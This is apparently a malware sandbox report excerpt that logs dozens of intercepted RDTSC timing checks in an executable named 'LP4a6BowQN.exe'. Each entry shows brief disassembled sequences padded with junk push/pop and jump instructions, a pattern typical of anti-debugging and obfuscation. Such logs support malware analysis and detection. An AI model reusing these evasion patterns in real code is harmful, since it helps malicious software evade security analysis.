                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A661E5 second address: A661EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A661EB second address: A66213 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007FC8BCD07016h 0x00000009 jmp 00007FC8BCD07021h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 js 00007FC8BCD07016h 0x00000016 popad 0x00000017 pushad 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A66351 second address: A6635D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6635D second address: A66361 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A66619 second address: A6661D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6661D second address: A6662C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6662C second address: A6664F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FC8BCFEEF19h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A667A5 second address: A667AA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A667AA second address: A667BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push esi 0x00000007 pop esi 0x00000008 popad 0x00000009 pushad 0x0000000a jns 00007FC8BCFEEF06h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A66A39 second address: A66A3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A66A3F second address: A66A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A66A45 second address: A66A49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A672A5 second address: A672C7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8BCFEEF06h 0x00000008 jmp 00007FC8BCFEEF12h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push edx 0x00000011 pop edx 0x00000012 push edx 0x00000013 pop edx 0x00000014 pop ebx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A679B8 second address: A679E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FC8BCD07028h 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d popad 0x0000000e jg 00007FC8BCD07018h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push esi 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A679E4 second address: A679EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6BA5A second address: A6BA5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6BA5E second address: A6BA62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6FC37 second address: A6FC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6FC3B second address: A6FC3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F5C6 second address: A6F5D0 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F5D0 second address: A6F5D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F5D8 second address: A6F5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F5DC second address: A6F5F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF17h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F76B second address: A6F78E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FC8BCD0702Eh 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F78E second address: A6F794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F794 second address: A6F7A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07020h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F903 second address: A6F912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF0Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F912 second address: A6F92D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07025h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A6F92D second address: A6F932 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7A1AE second address: A7A1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7EE67 second address: A7EE7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF11h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7EE7C second address: A7EEA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07025h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC8BCD0701Dh 0x0000000e jnl 00007FC8BCD07016h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7E847 second address: A7E87D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FC8BCFEEF12h 0x0000000c popad 0x0000000d pushad 0x0000000e jng 00007FC8BCFEEF12h 0x00000014 jns 00007FC8BCFEEF06h 0x0000001a jl 00007FC8BCFEEF06h 0x00000020 push eax 0x00000021 push edx 0x00000022 ja 00007FC8BCFEEF06h 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7E87D second address: A7E881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7E881 second address: A7E88A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7E88A second address: A7E89B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC8BCD07016h 0x0000000a push esi 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7E89B second address: A7E89F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A7E9CF second address: A7E9DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007FC8BCD07016h 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A91523 second address: A91527 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A91527 second address: A9153F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FC8BCD07022h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B3E6C second address: 9B3E72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B3E72 second address: 9B3E76 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9B3E76 second address: 9B3E81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98AA9 second address: A98AD0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07023h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jmp 00007FC8BCD0701Ch 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98AD0 second address: A98AE7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF12h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98AE7 second address: A98AFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jg 00007FC8BCD0702Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98AFE second address: A98B08 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC8BCFEEF06h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98F3F second address: A98F4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FC8BCD07016h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98F4C second address: A98F5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC8BCFEEF0Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98F5A second address: A98F5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A98F5E second address: A98F7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC8BCFEEF15h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A99123 second address: A99137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07020h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A99137 second address: A9913B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A9913B second address: A99145 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A99145 second address: A9914B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A9914B second address: A9914F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A99CD5 second address: A99CDA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A9DA6D second address: A9DA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A9DA71 second address: A9DAA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF19h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FC8BCFEEF19h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: A9D746 second address: A9D750 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC8BCD07016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AA9639 second address: AA963F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AA963F second address: AA9643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AA9643 second address: AA965C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCFEEF0Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jc 00007FC8BCFEEF06h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AA965C second address: AA9680 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC8BCD07016h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007FC8BCD07025h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AA9680 second address: AA96A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FC8BCFEEF10h 0x00000012 js 00007FC8BCFEEF06h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AADC85 second address: AADCA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC8BCD07028h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ABB834 second address: ABB849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC8BCFEEF06h 0x0000000a popad 0x0000000b jno 00007FC8BCFEEF0Ah 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ABB849 second address: ABB862 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FC8BCD07016h 0x00000009 jmp 00007FC8BCD0701Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF0B2 second address: ACF0B8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF0B8 second address: ACF0DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 pushad 0x00000008 pushad 0x00000009 jmp 00007FC8BCD07029h 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF0DE second address: ACF0EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF50B second address: ACF533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD07022h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FC8BCD07022h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF533 second address: ACF559 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC8BCFEEF0Ah 0x00000008 push esi 0x00000009 pop esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FC8BCFEEF16h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF687 second address: ACF68D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACF68D second address: ACF693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACFABB second address: ACFABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACFABF second address: ACFAD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF0Bh 0x00000007 js 00007FC8BCFEEF06h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACFAD9 second address: ACFAE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC8BCD07016h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: ACFAE4 second address: ACFAEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD2A68 second address: AD2A6E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD2A6E second address: AD2A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD2A74 second address: AD2A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD2D0D second address: AD2D11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD2DEA second address: AD2DF8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD2DF8 second address: AD2DFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD3085 second address: AD30AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCD0701Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jne 00007FC8BCD0702Ch 0x00000011 pushad 0x00000012 jmp 00007FC8BCD0701Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD30AE second address: AD3106 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 nop 0x00000006 or dword ptr [ebp+122D2472h], edx 0x0000000c push dword ptr [ebp+122D1D9Dh] 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FC8BCFEEF08h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000014h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c pushad 0x0000002d call 00007FC8BCFEEF10h 0x00000032 mov bh, D6h 0x00000034 pop edx 0x00000035 jno 00007FC8BCFEEF0Ch 0x0000003b popad 0x0000003c push 9D613D65h 0x00000041 pushad 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD7D60 second address: AD7D72 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jo 00007FC8BCD0701Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD7D72 second address: AD7D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD7D79 second address: AD7D80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: AD7D80 second address: AD7D8A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC8BCFEEF0Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EDFC4 second address: 9EDFC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EE191 second address: 9EE1AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC8BCFEEF17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EE37B second address: 9EE37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EE37F second address: 9EE383 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\LP4a6BowQN.exeRDTSC instruction interceptor: First address: 9EE383 second address: 9EE389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
